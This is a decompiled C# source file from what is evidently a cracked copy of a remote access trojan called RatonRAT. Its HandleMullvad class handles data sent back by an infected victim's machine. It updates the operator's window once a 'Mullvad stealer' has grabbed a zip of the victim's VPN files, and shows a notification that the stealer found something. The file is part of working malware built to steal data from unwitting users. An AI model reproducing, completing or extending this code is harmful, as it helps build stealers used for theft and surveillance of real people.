Files
2026-08-27 11:23:13 -06:00

36 lines
1.4 KiB
C#

// Decompiled with JetBrains decompiler
// Type: Server.Handlers.HandleMullvad
// Assembly: Raton, Version=0.4.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 36C4E416-7F8D-4D23-930F-B5CCB0D810E7
// Assembly location: C:\Users\user\Desktop\v3.8.0 Deluxe Plugins (v4.0.0) cracked\Raton.exe
using Raton.Forms.ClientForms.Stealers;
using Raton.Windows;
using Server.Connection;
using Stuff;
using System;
using System.Windows.Forms;
#nullable disable
namespace Server.Handlers;
internal class HandleMullvad
{
public HandleMullvad(SillyClient client, Unpack rip2pac)
{
ratonMullvad ratonTelegram = (ratonMullvad) Application.OpenForms["Mullvad | Client ID: " + rip2pac.GetAsString("UID")];
if (ratonTelegram == null)
return;
if (ratonTelegram.SillyClient == null)
ratonTelegram.SillyClient = client;
ratonTelegram.Invoke((Delegate) (() =>
{
ratonTelegram.label1.Text = "Got the Mullvad .zip!";
ratonTelegram.label1.ForeColor = System.Drawing.Color.LightGreen;
ratonTelegram.textBox1.Text = rip2pac.GetAsString("Path");
ratonTelegram.button1.Enabled = true;
Notification.Show($"RatonRAT • {rip2pac.GetAsString("UID")}\nMullvad stealer has found something", "\uE946", new System.Windows.Media.Color?(System.Windows.Media.Color.FromArgb(byte.MaxValue, byte.MaxValue, (byte) 237, (byte) 41)));
}));
}
}